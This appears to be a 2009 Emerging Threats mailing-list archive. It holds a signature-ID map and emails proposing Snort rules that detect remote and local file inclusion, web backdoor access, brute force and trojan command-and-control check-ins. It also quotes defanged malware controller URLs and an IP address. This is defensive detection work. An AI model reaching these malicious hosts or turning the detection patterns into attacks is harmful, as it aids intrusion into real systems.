        2002849 || ET WEB-MISC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
        2003520 || ET EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
        2007611 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
        2007612 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
        2007613 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
        2007614 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
        2007950 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
        2008142 || ET MALWARE Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
        2008278 || ET MALWARE Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
        2008379 || ET MALWARE Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
        2008505 || ET MALWARE Adaware.BarACE Checkin and Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_BarAce || url,doc.emergingthreats.net/2008505 || url,www.symantec.com/security_response/writeup.jsp?docid=2007-021714-2431-99&tabid=2
        2008973 || ET MALWARE onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
        2009126 || ET Malware Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
        2009156 || ET MALWARE Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized
        2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From jonkman at jonkmans.com  Tue May 12 16:03:44 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 12 May 2009 16:03:44 -0400
Subject: [Emerging-Sigs] RealVNC sigs 2002922 + 2002920
In-Reply-To: <20090512144759.vqqacfbwc0ssocgc@mail.afferentsecurity.com>
References: <1242090023.7228.257.camel@localhost>
	<20090512144759.vqqacfbwc0ssocgc@mail.afferentsecurity.com>
Message-ID: <4A09D620.7040604@jonkmans.com>

Good points. The reason they're in the exploit link even though
categorized policy is that they're part of the flowbits chain to detect
a successful vnc auth. Doesn't make sense if you're trying to read that
flowbit machine and these 2 are off in policy.

But, I'll put a note in the file and put these where they belong.

Matt

Jack Pepper wrote:
> Quoting Frank Knobbe <frank at knobbe.us>:
> 
>> SIDs 2002922 + 2002920 are in the exploit category, even though they
>> carry a ET POLICY label. Now, I'm aware there was that old RealVNC issue
>> a long while back. We should either move those sigs from EXPLOIT to the
>> POLICY group, or perhaps remove these sigs altogether.
> 
> I lobby for putting them into the POLICY group.  The rule does not  
> detect an exploit, it detects an out-of-date or misconfigured VNC  
> (policy).
> 
> jp
> 
> 
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From signatures at stillsecure.com  Wed May 13 08:30:11 2009
From: signatures at stillsecure.com (signatures)
Date: Wed, 13 May 2009 06:30:11 -0600
Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - May-13-2009
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292E@webmail.latis.com>

Hi Matt,

Please find 10 New Signatures below:

1.       WEB-PHP HIOX Browser Statistics hioxstats.php hm Parameter Local File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP HIOX Browser Statistics hioxstats.php hm Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/hioxstats.php?"; nocase; uricontent:"hm="; nocase; content:"../"; classtype:web-application-attack; reference:url,secunia.com/advisories/31299/; reference:url,milw0rm.com/exploits/6162; sid:2009058; rev:1;)
 

2.       WEB-PHP HIOX Browser Statistics hioxstats.php hm Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP HIOX Browser Statistics hioxstats.php hm Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/hioxstats.php?"; nocase; uricontent:"hm="; nocase; pcre:"/hm=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/31299/; reference:url,milw0rm.com/exploits/6162; sid:2009059; rev:1;)
 

3.       WEB-PHP HIOX Browser Statistics hioxupdate.php hm Parameter Local File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP HIOX Browser Statistics hioxupdate.php hm Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/hioxupdate.php?"; nocase; uricontent:"hm="; nocase; content:"../"; classtype:web-application-attack; reference:url,secunia.com/advisories/31299/; reference:url,milw0rm.com/exploits/6162; sid:2009060; rev:1;)
 

4.       WEB-PHP HIOX Browser Statistics hioxupdate.php hm Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP HIOX Browser Statistics hioxupdate.php hm Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/hioxupdate.php?"; nocase; uricontent:"hm="; nocase; pcre:"/hm=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/31299/; reference:url,milw0rm.com/exploits/6162; sid:2009061; rev:1;)



5.       WEB-PHP LnBlog showblog.php plugin Parameter Local File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP LnBlog showblog.php plugin Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/showblog.php?"; nocase; uricontent:"plugin="; nocase; content:"../"; classtype:web-application-attack; reference:bugtraq,31459; reference:url,secunia.com/advisories/32032; reference:url,milw0rm.com/exploits/6601; sid:2009062; rev:1;)



6.       WEB-PHP MiGCMS content_image.class.php GLOBALS Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP MiGCMS content_image.class.php GLOBALS Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/content_image.class.php?"; nocase; uricontent:"GLOBALS[application][app_root]="; nocase; pcre:"/GLOBALS\[application\]\[app_root\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5901; reference:bugtraq,29874; sid:2009075; rev:1;)



7.       WEB-PHP MiGCMS collection.class.php GLOBALS Parameter Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP MiGCMS collection.class.php GLOBALS Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/collection.class.php?"; nocase; uricontent:"GLOBALS[application][app_root]="; nocase; pcre:"/GLOBALS\[application\]\[app_root\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5901; reference:bugtraq,29874; sid:2009076; rev:1;)



8.       WEB-PHP phpDMCA adodb-errorpear.inc.php Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP phpDMCA adodb-errorpear.inc.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/adodb-errorpear.inc.php?"; nocase; uricontent:"ourlinux_root_path="; pcre:"/ourlinux_root_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5897; reference:bugtraq,29880; sid:2009077; rev:1;)



9.       WEB-PHP phpDMCA adodb-pear.inc.php Remote File Inclusion
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP phpDMCA adodb-pear.inc.php Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/adodb-pear.inc.php?"; nocase; uricontent:"ourlinux_root_path="; pcre:"/ourlinux_root_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/5897; reference:bugtraq,29880; sid:2009078; rev:1;)



10.   WEB-ATTACKS Chance-i DiViS-Web DVR System ActiveX Control AddSiteEx Method Buffer Overflow
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Chance-i DiViS-Web DVR System ActiveX Control AddSiteEx Method Buffer Overflow"; flow:to_client,established; content:"CLSID"; nocase; content:"66F7F252-3FE1-4650-B1E5-94B2A38271C5"; nocase; distance:0; content:"AddSiteEx"; nocase; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8391; reference:bugtraq,34468; sid:20097408; rev:1;)




Looking forward for your comments, if any...

 
Thanks & Regards,
StillSecure
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090513/2ee29d0f/attachment.html

From pepperjack at afferentsecurity.com  Wed May 13 09:02:27 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Wed, 13 May 2009 08:02:27 -0500
Subject: [Emerging-Sigs] adjustment to 2009345
Message-ID: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com>

it needs a limit threshold for those cases where NTLM is in use:

alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET  
ATTACK-RESPONSE HTTP 401 Unauthorized"; flow:from_server,established;  
content:"HTTP/1."; depth:7; content:" 401"; within:5;  
classtype:attempted-recon;  
reference:url,doc.emergingthreats.net/2009345;  
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized; sid:2009345; rev:3;threshold: type limit, track by_src, seconds 1200, count  
1;)


jp

-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From jonkman at jonkmans.com  Wed May 13 11:28:52 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 13 May 2009 11:28:52 -0400
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com>
Message-ID: <4A0AE734.8080507@jonkmans.com>

How about we go the other way and have a threshold. Like 5 hits to trip
it in 2 minutes.

Would that eliminate the ntlm default tried you are seeing?

matt

Jack Pepper wrote:
> it needs a limit threshold for those cases where NTLM is in use:
> 
> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET  
> ATTACK-RESPONSE HTTP 401 Unauthorized"; flow:from_server,established;  
> content:"HTTP/1."; depth:7; content:" 401"; within:5;  
> classtype:attempted-recon;  
> reference:url,doc.emergingthreats.net/2009345;  
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized; sid:2009345; rev:3;threshold: type limit, track by_src, seconds 1200, count  
> 1;)
> 
> 
> jp
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From phatbuckett at gmail.com  Wed May 13 11:54:02 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Wed, 13 May 2009 08:54:02 -0700
Subject: [Emerging-Sigs] Bzub/Cimuz/Tanspy rule alteration/addition
Message-ID: <839aec700905130854n16622eefj5ccf2b2a71ceb115@mail.gmail.com>

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Win32.Agent Reporting User Activity"; flow:established,to_server;
uricontent:".php?phid="; nocase; uricontent:"&ver="; nocase;
uricontent:"&lg="; nocase; pcre:"/User-Agent\:[^\n]+z/i";
classtype:trojan-activity;
reference:url,doc.emergingthreats.net/2002792;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi;
sid:2002792; rev:4;)

This Bzub/Bzup/Cimuz/Tanspy sample appears to be an evolution of what
the above rule was looking for:

http://www.threatexpert.com/report.aspx?md5=09680948ce5164b96f6d48b23527c352

r.php?ver=2.6.17&lg=US&phid=0A5F16C521D34ABAAF9D31C6A058759A13ECEC591E644FF1AA699AB37F5F10C6&r=1241947041

If we decouple the 'phid' parameter from the start of the query string
it will work better. I don't have complete payload (or pcap, or
sample) so it's possible the user-agent will be too restrictive. Fix
up the old rule or go with a new one?

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Bzub/Cimuz/Tanspy Reporting User Activity";
flow:established,to_server; uricontent:"ver="; nocase;
uricontent:"&lg="; nocase; uricontent:"&phid="; nocase;
uricontent:"&r="; classtype:trojan-activity; sid:XXXXXXX; rev:1;)

-- 
Darren Spruell
phatbuckett at gmail.com

From jonkman at jonkmans.com  Wed May 13 12:24:06 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 13 May 2009 12:24:06 -0400
Subject: [Emerging-Sigs] Bzub/Cimuz/Tanspy rule alteration/addition
In-Reply-To: <839aec700905130854n16622eefj5ccf2b2a71ceb115@mail.gmail.com>
References: <839aec700905130854n16622eefj5ccf2b2a71ceb115@mail.gmail.com>
Message-ID: <4A0AF426.7010408@jonkmans.com>

Good catch Darren!

I'll modify the old rule, and to make sure add a pcre for the phid
field. Looks hex and has a long length. that should be quite unique.

Matt

Darren Spruell wrote:
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Win32.Agent Reporting User Activity"; flow:established,to_server;
> uricontent:".php?phid="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&lg="; nocase; pcre:"/User-Agent\:[^\n]+z/i";
> classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2002792;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi;
> sid:2002792; rev:4;)
> 
> This Bzub/Bzup/Cimuz/Tanspy sample appears to be an evolution of what
> the above rule was looking for:
> 
> http://www.threatexpert.com/report.aspx?md5=09680948ce5164b96f6d48b23527c352
> 
> r.php?ver=2.6.17&lg=US&phid=0A5F16C521D34ABAAF9D31C6A058759A13ECEC591E644FF1AA699AB37F5F10C6&r=1241947041
> 
> If we decouple the 'phid' parameter from the start of the query string
> it will work better. I don't have complete payload (or pcap, or
> sample) so it's possible the user-agent will be too restrictive. Fix
> up the old rule or go with a new one?
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Bzub/Cimuz/Tanspy Reporting User Activity";
> flow:established,to_server; uricontent:"ver="; nocase;
> uricontent:"&lg="; nocase; uricontent:"&phid="; nocase;
> uricontent:"&r="; classtype:trojan-activity; sid:XXXXXXX; rev:1;)
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From phatbuckett at gmail.com  Wed May 13 12:03:38 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Wed, 13 May 2009 09:03:38 -0700
Subject: [Emerging-Sigs] BManager communication
Message-ID: <839aec700905130903j772857fcwdcf65406f5c881ef@mail.gmail.com>

Looks to be a downloader communicating with backend management kit,
characteristic URLs:

hXXp://websitecheck.cn/nr/controller.php?action=bot&entity_list=&uid=&first=1&guid=5421361321&rnd=874493
   hXXp://turokgame.cn/bm/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3858361321&rnd=923635
 hXXp://78.109.29.112/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633

Related (later stage)

 hXXp://78.109.29.112/new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1239013921:unique_start;1239013932:unique_start;1239013964:unique_start;1239022982:unique_start;1239024633:unique_start;1239875139:unique_start

http://www.threatexpert.com/report.aspx?md5=ffe09f9b2470575727ea72bcb3ebce0a

Microsoft calls it Bredolab, others some variant of Downloader.

Sorry, no pcaps/samples.


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
BManager downloader communication with controller (1)";
flow:established,to_server; uricontent:"action="; nocase;
uricontent:"&entity_list="; nocase; uricontent:"&uid="; nocase;
uricontent:"&first="; uricontent:"&guid="; nocase; uricontent:"&rnd=";
nocase; classtype:trojan-activity; sid:XXXXXXX; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
BManager downloader communication with controller (2)";
flow:established,to_server; uricontent:"action="; nocase;
uricontent:"&guid="; nocase; uricontent:"&rnd="; nocase;
uricontent:"&uid="; nocase; uricontent:"&entity="; nocase;
classtype:trojan-activity; sid:XXXXXXX; rev:1;)

-- 
Darren Spruell
phatbuckett at gmail.com

From jonkman at jonkmans.com  Wed May 13 13:01:33 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 13 May 2009 13:01:33 -0400
Subject: [Emerging-Sigs] adjustment to 2009345
In-Reply-To: <4A0AE734.8080507@jonkmans.com>
References: <20090513080227.rzqjlq1d8gw8w4ww@mail.afferentsecurity.com>
	<4A0AE734.8080507@jonkmans.com>
Message-ID: <4A0AFCED.5060703@jonkmans.com>

I see now, have a similar situation. Added a threshold, pushing it out now.

Thanks Jack!

matt

Matt Jonkman wrote:
> How about we go the other way and have a threshold. Like 5 hits to trip
> it in 2 minutes.
> 
> Would that eliminate the ntlm default tried you are seeing?
> 
> matt
> 
> Jack Pepper wrote:
>> it needs a limit threshold for those cases where NTLM is in use:
>>
>> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET  
>> ATTACK-RESPONSE HTTP 401 Unauthorized"; flow:from_server,established;  
>> content:"HTTP/1."; depth:7; content:" 401"; within:5;  
>> classtype:attempted-recon;  
>> reference:url,doc.emergingthreats.net/2009345;  
>> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized; sid:2009345; rev:3;threshold: type limit, track by_src, seconds 1200, count  
>> 1;)
>>
>>
>> jp
>>
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From emerging at emergingthreats.net  Wed May 13 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 13 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090513200011.22A3C4504D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Wed May 13 16:00:11 2009 [***]

[+++]          Added rules:          [+++]

 2002920 - ET POLICY VNC Authentication Failure (emerging-policy.rules)
 2002922 - ET POLICY VNC Authentication Successful (emerging-policy.rules)
 2009349 - ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity (emerging-virus.rules)
 2009350 - ET TROJAN Win32.Hupigon Control Server Response (emerging-virus.rules)


[///]     Modified active rules:     [///]

 2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)


[---]         Removed rules:         [---]

 2002792 - ET TROJAN Win32.Agent Reporting User Activity (emerging-virus.rules)
 2002920 - ET POLICY VNC Authentication Failure (emerging-exploit.rules)
 2002922 - ET POLICY VNC Authentication Successful (emerging-exploit.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-exploit.rules (2):
        #This is a good auth back from the server, in 2002922 in the policy ruleset
        #this is for a server saying auth failed, in 2002920 in the policy ruleset

     -> Added to emerging-policy.rules (1):
        #part of the state machine sigs in EXPLOIT/RealVNC

     -> Added to emerging-sid-msg.map (4):
        2009349 || ET TROJAN Bzub/Cimuz/Tanspy Reporting User Activity
